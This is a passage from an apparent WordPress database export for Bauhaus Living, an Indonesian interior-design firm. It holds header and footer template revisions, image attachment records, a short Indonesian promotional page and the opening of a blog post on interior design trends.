			style=\"width:157px ; height:40px\" \n				/>\n							</a>\n		<nav>\n            <button>\n            		Menu            	\n            </button>\n			<ul id=\"menu-primary\"><li id=\"menu-item-30\"><a href=\"https://bauhaus.futuremediatrix.com/\">Home</a></li>\n<li id=\"menu-item-774\"><a href=\"https://bauhaus.futuremediatrix.com/about/\">About</a></li>\n<li id=\"menu-item-4715\"><a href=\"#\">Projects</a>\n<ul>\n	<li id=\"menu-item-4675\"><a href=\"https://bauhaus.futuremediatrix.com/residential/\">Residential</a></li>\n	<li id=\"menu-item-4691\"><a href=\"https://bauhaus.futuremediatrix.com/commercial/\">Commercial</a></li>\n	<li id=\"menu-item-4762\"><a href=\"https://bauhaus.futuremediatrix.com/office/\">Office</a></li>\n</ul>\n</li>\n<li id=\"menu-item-773\"><a href=\"https://bauhaus.futuremediatrix.com/contact/\">Contact</a></li>\n</ul>        </nav>\n						<form role=\"search\" method=\"get\" action=\"https://bauhaus.futuremediatrix.com/\">\n						        <input type=\"search\" placeholder=\"Search …\" value=\"\" name=\"s\" title=\"Search for:\" />\n				   			 	<button type=\"submit\">\n				   			 	</button>\n						</form>									\n		<nav>\n            <button>\n            </button>\n            <nav >\n				<ul id=\"menu-primary-1\"><li><a href=\"https://bauhaus.futuremediatrix.com/\">Home</a></li>\n<li><a href=\"https://bauhaus.futuremediatrix.com/about/\">About</a></li>\n<li><a href=\"#\">Projects</a>\n<ul>\n	<li><a href=\"https://bauhaus.futuremediatrix.com/residential/\">Residential</a></li>\n	<li><a href=\"https://bauhaus.futuremediatrix.com/commercial/\">Commercial</a></li>\n	<li><a href=\"https://bauhaus.futuremediatrix.com/office/\">Office</a></li>\n</ul>\n</li>\n<li><a href=\"https://bauhaus.futuremediatrix.com/contact/\">Contact</a></li>\n</ul>			</nav>\n        </nav>\n					 	<!-- Display when you choose background per Post -->\n														<h1>\n															</h1>\n								<ul><li><a href=\"https://bauhaus.futuremediatrix.com/\" title=\"Home\">Home</a></li> <li></li><li>Builder Header Footer</li></ul>','Header Banner 1','','inherit','closed','closed','','169-revision-v1','','','2023-09-22 10:52:35','2023-09-22 10:52:35','',169,'https://bauhaus.futuremediatrix.com/?p=4941',0,'revision','',0),(4943,2,'2023-09-22 10:58:40','2023-09-22 10:58:40','<a href=\"https://bauhaus.futuremediatrix.com/ \"   >\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/bahaus_logo.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_desktop\" \n					style=\"width:159px ; height:57px\" \n				/>\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/bahaus_logo.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/bahaus_logo.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n		<nav>\n            <button>\n            		Menu            	\n            </button>\n			<ul id=\"menu-primary\"><li id=\"menu-item-30\"><a href=\"https://bauhaus.futuremediatrix.com/\">Home</a></li>\n<li id=\"menu-item-774\"><a href=\"https://bauhaus.futuremediatrix.com/about/\">About</a></li>\n<li id=\"menu-item-4715\"><a href=\"#\">Projects</a>\n<ul>\n	<li id=\"menu-item-4675\"><a href=\"https://bauhaus.futuremediatrix.com/residential/\">Residential</a></li>\n	<li id=\"menu-item-4691\"><a href=\"https://bauhaus.futuremediatrix.com/commercial/\">Commercial</a></li>\n	<li id=\"menu-item-4762\"><a href=\"https://bauhaus.futuremediatrix.com/office/\">Office</a></li>\n</ul>\n</li>\n<li id=\"menu-item-773\"><a href=\"https://bauhaus.futuremediatrix.com/contact/\">Contact</a></li>\n</ul>        </nav>\n						<form role=\"search\" method=\"get\" action=\"https://bauhaus.futuremediatrix.com/\">\n						        <input type=\"search\" placeholder=\"Search …\" value=\"\" name=\"s\" title=\"Search for:\" />\n				   			 	<button type=\"submit\">\n				   			 	</button>\n						</form>									\n		<nav>\n            <button>\n            </button>\n            <nav >\n				<ul id=\"menu-primary-1\"><li><a href=\"https://bauhaus.futuremediatrix.com/\">Home</a></li>\n<li><a href=\"https://bauhaus.futuremediatrix.com/about/\">About</a></li>\n<li><a href=\"#\">Projects</a>\n<ul>\n	<li><a href=\"https://bauhaus.futuremediatrix.com/residential/\">Residential</a></li>\n	<li><a href=\"https://bauhaus.futuremediatrix.com/commercial/\">Commercial</a></li>\n	<li><a href=\"https://bauhaus.futuremediatrix.com/office/\">Office</a></li>\n</ul>\n</li>\n<li><a href=\"https://bauhaus.futuremediatrix.com/contact/\">Contact</a></li>\n</ul>			</nav>\n        </nav>\n					 	<!-- Display when you choose background per Post -->\n														<h1>\n															</h1>\n								<ul><li><a href=\"https://bauhaus.futuremediatrix.com/\" title=\"Home\">Home</a></li> <li></li><li>Builder Header Footer</li></ul>','Header Banner 1','','inherit','closed','closed','','169-revision-v1','','','2023-09-22 10:58:40','2023-09-22 10:58:40','',169,'https://bauhaus.futuremediatrix.com/?p=4943',0,'revision','',0),(4944,2,'2023-09-22 10:58:59','2023-09-22 10:58:59','<a href=\"https://bauhaus.futuremediatrix.com/ \"   >\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/bahaus_logo.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:57px\" \n				/>\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/bahaus_logo.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/bahaus_logo.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n		<nav>\n            <button>\n            		Menu            	\n            </button>\n			<ul id=\"menu-primary\"><li id=\"menu-item-30\"><a href=\"https://bauhaus.futuremediatrix.com/\">Home</a></li>\n<li id=\"menu-item-774\"><a href=\"https://bauhaus.futuremediatrix.com/about/\">About</a></li>\n<li id=\"menu-item-4715\"><a href=\"#\">Projects</a>\n<ul>\n	<li id=\"menu-item-4675\"><a href=\"https://bauhaus.futuremediatrix.com/residential/\">Residential</a></li>\n	<li id=\"menu-item-4691\"><a href=\"https://bauhaus.futuremediatrix.com/commercial/\">Commercial</a></li>\n	<li id=\"menu-item-4762\"><a href=\"https://bauhaus.futuremediatrix.com/office/\">Office</a></li>\n</ul>\n</li>\n<li id=\"menu-item-773\"><a href=\"https://bauhaus.futuremediatrix.com/contact/\">Contact</a></li>\n</ul>        </nav>\n						<form role=\"search\" method=\"get\" action=\"https://bauhaus.futuremediatrix.com/\">\n						        <input type=\"search\" placeholder=\"Search …\" value=\"\" name=\"s\" title=\"Search for:\" />\n				   			 	<button type=\"submit\">\n				   			 	</button>\n						</form>									\n		<nav>\n            <button>\n            </button>\n            <nav >\n				<ul id=\"menu-primary-1\"><li><a href=\"https://bauhaus.futuremediatrix.com/\">Home</a></li>\n<li><a href=\"https://bauhaus.futuremediatrix.com/about/\">About</a></li>\n<li><a href=\"#\">Projects</a>\n<ul>\n	<li><a href=\"https://bauhaus.futuremediatrix.com/residential/\">Residential</a></li>\n	<li><a href=\"https://bauhaus.futuremediatrix.com/commercial/\">Commercial</a></li>\n	<li><a href=\"https://bauhaus.futuremediatrix.com/office/\">Office</a></li>\n</ul>\n</li>\n<li><a href=\"https://bauhaus.futuremediatrix.com/contact/\">Contact</a></li>\n</ul>			</nav>\n        </nav>\n					 	<!-- Display when you choose background per Post -->\n														<h1>\n															</h1>\n								<ul><li><a href=\"https://bauhaus.futuremediatrix.com/\" title=\"Home\">Home</a></li> <li></li><li>Builder Header Footer</li></ul>','Header Banner 1','','inherit','closed','closed','','169-revision-v1','','','2023-09-22 10:58:59','2023-09-22 10:58:59','',169,'https://bauhaus.futuremediatrix.com/?p=4944',0,'revision','',0),(4946,2,'2023-09-22 11:02:30','2023-09-22 11:02:30','<a href=\"https://demo.ovatheme.com/retirio/ \"   >\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:40px\" \n				/>\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n		<nav>\n            <button>\n            		Menu            	\n            </button>\n			<ul id=\"menu-primary\"><li id=\"menu-item-29\"><a href=\"https://demo.ovatheme.com/retirio/\">Home</a>\n<ul>\n	<li id=\"menu-item-30\"><a href=\"https://demo.ovatheme.com/retirio/\">Home 1</a></li>\n	<li id=\"menu-item-31\"><a href=\"https://demo.ovatheme.com/retirio/home-2/\">Home 2</a></li>\n	<li id=\"menu-item-32\"><a href=\"https://demo.ovatheme.com/retirio/home-3/\">Home 3</a></li>\n</ul>\n</li>\n<li id=\"menu-item-33\"><a href=\"#\">Pages</a>\n<ul>\n	<li id=\"menu-item-774\"><a href=\"https://demo.ovatheme.com/retirio/about/\">About</a></li>\n	<li id=\"menu-item-773\"><a href=\"https://demo.ovatheme.com/retirio/contact/\">Contact</a></li>\n	<li id=\"menu-item-1046\"><a href=\"https://demo.ovatheme.com/retirio/team\">Our Team</a></li>\n	<li id=\"menu-item-2483\"><a href=\"https://demo.ovatheme.com/retirio/team/aleesha-brown/\">Team Detail</a></li>\n</ul>\n</li>\n<li id=\"menu-item-1368\"><a href=\"https://demo.ovatheme.com/retirio/services/\">Services</a>\n<ul>\n	<li id=\"menu-item-2472\"><a href=\"https://demo.ovatheme.com/retirio/services/\">Service Listing</a></li>\n	<li id=\"menu-item-2471\"><a href=\"https://demo.ovatheme.com/retirio/service/architecture/\">Service Detail</a></li>\n</ul>\n</li>\n<li id=\"menu-item-35\"><a href=\"#\">Projects</a>\n<ul>\n	<li id=\"menu-item-365\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_1\">Archive Project 1</a></li>\n	<li id=\"menu-item-366\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_2&#038;posts_per_page=7\">Archive Project 2</a></li>\n	<li id=\"menu-item-367\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_3\">Archive Project 3</a></li>\n	<li id=\"menu-item-368\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_4&#038;posts_per_page=7\">Archive Project 4</a></li>\n	<li id=\"menu-item-569\"><a href=\"https://demo.ovatheme.com/retirio/project-5/\">Element Projects 5</a></li>\n	<li id=\"menu-item-568\"><a href=\"https://demo.ovatheme.com/retirio/project-6/\">Element Projects 6</a></li>\n	<li id=\"menu-item-4612\"><a href=\"https://demo.ovatheme.com/retirio/project-7/\">Element Projects 7</a></li>\n	<li id=\"menu-item-1169\"><a href=\"https://demo.ovatheme.com/retirio/project/modern-villa/\">Single Project</a></li>\n</ul>\n</li>\n<li id=\"menu-item-3426\"><a href=\"https://demo.ovatheme.com/retirio/shop/\">Shop</a></li>\n<li id=\"menu-item-790\"><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog</a>\n<ul>\n	<li id=\"menu-item-1092\"><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog Default</a></li>\n	<li id=\"menu-item-1094\"><a href=\"https://demo.ovatheme.com/retirio/blog/?layout_sidebar=layout_1c\">Default No Sidebar</a></li>\n	<li id=\"menu-item-1095\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid\">Blog Grid</a></li>\n	<li id=\"menu-item-1096\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid&#038;layout_sidebar=layout_1c\">Grid No Sidebar</a></li>\n	<li id=\"menu-item-1097\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry\">Blog Masonry</a></li>\n	<li id=\"menu-item-1098\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry&#038;layout_sidebar=layout_1c\">Masonry No Sidebar</a></li>\n</ul>\n</li>\n</ul>        </nav>\n						<form role=\"search\" method=\"get\" action=\"https://demo.ovatheme.com/retirio/\">\n						        <input type=\"search\" placeholder=\"Search …\" value=\"\" name=\"s\" title=\"Search for:\" />\n				   			 	<button type=\"submit\">\n				   			 	</button>\n						</form>									\n		<nav>\n            <button>\n            </button>\n            <nav >\n				<ul id=\"menu-primary-1\"><li><a href=\"https://demo.ovatheme.com/retirio/\">Home</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/\">Home 1</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/home-2/\">Home 2</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/home-3/\">Home 3</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Pages</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/about/\">About</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/contact/\">Contact</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/team\">Our Team</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/team/aleesha-brown/\">Team Detail</a></li>\n</ul>\n</li>\n<li><a href=\"https://demo.ovatheme.com/retirio/services/\">Services</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/services/\">Service Listing</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/service/architecture/\">Service Detail</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Projects</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_1\">Archive Project 1</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_2&#038;posts_per_page=7\">Archive Project 2</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_3\">Archive Project 3</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_4&#038;posts_per_page=7\">Archive Project 4</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project-5/\">Element Projects 5</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project-6/\">Element Projects 6</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project-7/\">Element Projects 7</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/modern-villa/\">Single Project</a></li>\n</ul>\n</li>\n<li><a href=\"https://demo.ovatheme.com/retirio/shop/\">Shop</a></li>\n<li><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog Default</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?layout_sidebar=layout_1c\">Default No Sidebar</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid\">Blog Grid</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid&#038;layout_sidebar=layout_1c\">Grid No Sidebar</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry\">Blog Masonry</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry&#038;layout_sidebar=layout_1c\">Masonry No Sidebar</a></li>\n</ul>\n</li>\n</ul>			</nav>\n        </nav>','Header 1','','inherit','closed','closed','','4492-revision-v1','','','2023-09-22 11:02:30','2023-09-22 11:02:30','',4492,'https://bauhaus.futuremediatrix.com/?p=4946',0,'revision','',0),(4947,2,'2023-09-22 11:02:31','2023-09-22 11:02:31','<a href=\"https://bauhaus.futuremediatrix.com/ \"   >\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/bahaus_logo.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:57px\" \n				/>\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/bahaus_logo.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:57px\" \n				/>\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/bahaus_logo.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:57px\" \n				/>\n							</a>\n		<nav>\n            <button>\n            		Menu            	\n            </button>\n			<ul id=\"menu-primary\"><li id=\"menu-item-30\"><a href=\"https://bauhaus.futuremediatrix.com/\">Home</a></li>\n<li id=\"menu-item-774\"><a href=\"https://bauhaus.futuremediatrix.com/about/\">About</a></li>\n<li id=\"menu-item-4715\"><a href=\"#\">Projects</a>\n<ul>\n	<li id=\"menu-item-4675\"><a href=\"https://bauhaus.futuremediatrix.com/residential/\">Residential</a></li>\n	<li id=\"menu-item-4691\"><a href=\"https://bauhaus.futuremediatrix.com/commercial/\">Commercial</a></li>\n	<li id=\"menu-item-4762\"><a href=\"https://bauhaus.futuremediatrix.com/office/\">Office</a></li>\n</ul>\n</li>\n<li id=\"menu-item-773\"><a href=\"https://bauhaus.futuremediatrix.com/contact/\">Contact</a></li>\n</ul>        </nav>\n						<form role=\"search\" method=\"get\" action=\"https://bauhaus.futuremediatrix.com/\">\n						        <input type=\"search\" placeholder=\"Search …\" value=\"\" name=\"s\" title=\"Search for:\" />\n				   			 	<button type=\"submit\">\n				   			 	</button>\n						</form>									\n		<nav>\n            <button>\n            </button>\n            <nav >\n				<ul id=\"menu-primary-1\"><li><a href=\"https://bauhaus.futuremediatrix.com/\">Home</a></li>\n<li><a href=\"https://bauhaus.futuremediatrix.com/about/\">About</a></li>\n<li><a href=\"#\">Projects</a>\n<ul>\n	<li><a href=\"https://bauhaus.futuremediatrix.com/residential/\">Residential</a></li>\n	<li><a href=\"https://bauhaus.futuremediatrix.com/commercial/\">Commercial</a></li>\n	<li><a href=\"https://bauhaus.futuremediatrix.com/office/\">Office</a></li>\n</ul>\n</li>\n<li><a href=\"https://bauhaus.futuremediatrix.com/contact/\">Contact</a></li>\n</ul>			</nav>\n        </nav>','Header 1','','inherit','closed','closed','','4492-revision-v1','','','2023-09-22 11:02:31','2023-09-22 11:02:31','',4492,'https://bauhaus.futuremediatrix.com/?p=4947',0,'revision','',0),(4948,2,'2023-09-22 11:05:10','2023-09-22 11:05:10','<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Le\'t turn your ideas into reality</h2>		\n		[mc4wp_form id=\"107\"]		\n					<ul>\n								<li>\n																					<a href=\"tel:021 22544768 \">\n													021 22544768												</a>\n																			</li>\n											</ul>\n					<ul>\n								<li>\n																					<a href=\"mailto:info@bauhausliving.com \">\n													info@bauhausliving.com												</a>\n																			</li>\n											</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a href=\"https://www.instagram.com/bauhausliving/\" target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n			<h2>Explore</h2>		\n			<ul id=\"menu-menu-explore\"><li id=\"menu-item-4731\"><a href=\"https://bauhaus.futuremediatrix.com/\">Home</a></li>\n<li id=\"menu-item-4732\"><a href=\"https://bauhaus.futuremediatrix.com/about/\">About</a></li>\n<li id=\"menu-item-4733\"><a href=\"https://bauhaus.futuremediatrix.com/contact/\">Contact</a></li>\n</ul>		\n			<h2>Contact</h2>		\n					<ul>\n								<li>\n									<a href=\"https://goo.gl/maps/aDtccje1G7M53R3E8\" target=\"_blank\" rel=\"noopener\">BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620</a>								</li>\n											</ul>\n		<p>© 2023 bauhaus living, develop by <a href=\"http://www.futuremediatrix.com\">futuremediatrix.com</a></p>','Footer','','inherit','closed','closed','','103-revision-v1','','','2023-09-22 11:05:10','2023-09-22 11:05:10','',103,'https://bauhaus.futuremediatrix.com/?p=4948',0,'revision','',0),(4950,2,'2023-09-25 00:33:53','2023-09-25 00:33:53','','1695601950-picsay','','inherit','open','closed','','1695601950-picsay','','','2023-09-25 00:33:53','2023-09-25 00:33:53','',0,'https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/1695601950-picsay.png',0,'attachment','image/png',0),(4951,2,'2023-09-25 00:33:59','2023-09-25 00:33:59','https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/cropped-1695601950-picsay.png','cropped-1695601950-picsay.png','','inherit','open','closed','','cropped-1695601950-picsay-png','','','2023-09-25 00:33:59','2023-09-25 00:33:59','',0,'https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/cropped-1695601950-picsay.png',0,'attachment','image/png',0),(4952,2,'2023-09-25 01:02:15','2023-09-25 01:02:15','','bahaus_logo','','inherit','open','closed','','bahaus_logo-2','','','2023-09-25 01:02:15','2023-09-25 01:02:15','',0,'https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/bahaus_logo.jpg',0,'attachment','image/jpeg',0),(4953,2,'2023-09-25 01:02:19','2023-09-25 01:02:19','https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/cropped-bahaus_logo.jpg','cropped-bahaus_logo.jpg','','inherit','open','closed','','cropped-bahaus_logo-jpg','','','2023-09-25 01:02:19','2023-09-25 01:02:19','',0,'https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/cropped-bahaus_logo.jpg',0,'attachment','image/jpeg',0),(4955,3,'2023-09-25 10:06:37','2023-09-25 10:06:37','<!-- wp:paragraph -->\n<p>Lets make your dream home come true with bauhausliving</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Rumah adalah tempat ternyaman. Sehingga sudah seharusnya jika rumah juga dibuat dengan penuh cinta dan sesuai dengan keinginan penghuninya.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Bauhaus living siap membantu mewujudkan interior rumah nyaman versi kamu dengan segala impian yang ingin kamu wujudkan dalam rumah.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Bukan hanya soal interior, bauhaus living juga siap mewujudkan furniture-furniture yang mewakiki karakter kamu. Pastinya furniture ini dibuat secara custom sehingga pas dan sesuai dengan rumah kamu.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Siapkah kamu mewujudkan rumah impian kamu dengan sangat nyaman?</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mari konsultasikan dengan kami!</p>\n<!-- /wp:paragraph -->','\"Lets turn your ideas into reality!\"','','inherit','closed','closed','','1-revision-v1','','','2023-09-25 10:06:37','2023-09-25 10:06:37','',1,'https://bauhaus.futuremediatrix.com/?p=4955',0,'revision','',0),(4958,3,'2023-09-25 10:16:14','2023-09-25 10:16:14','<!-- wp:paragraph -->\n<p>Interior design is an ever-evolving field that constantly adapts to the changing needs and preferences of society. As we move into the future, several key trends and innovations are shaping the way we think about and approach interior design. In this article, we will explore some of the exciting developments that are likely to define the future of interior design. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:quote -->\n<blockquote class=\"wp-block-quote\"><!-- wp:heading {\"textColor\":\"black\"} -->\n<h2 class=\"wp-block-heading has-black-color has-text-color\"><strong>1. Sustainable Design</strong></h2>\n<!-- /wp:heading --></blockquote>\n<!-- /wp:quote -->\n\n<!-- wp:paragraph -->\n<p>One of the most significant trends in interior design\'s future is a strong focus on sustainability. With increasing environmental concerns, designers are placing a greater emphasis on eco-friendly materials, energy-efficient designs, and sustainable practices. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":230,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-2.jpg\" alt=\"\" class=\"wp-image-230\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":217,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image.jpg\" alt=\"\" class=\"wp-image-217\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:paragraph -->\n<p>This means incorporating elements such as recycled materials, energy-efficient lighting, and green 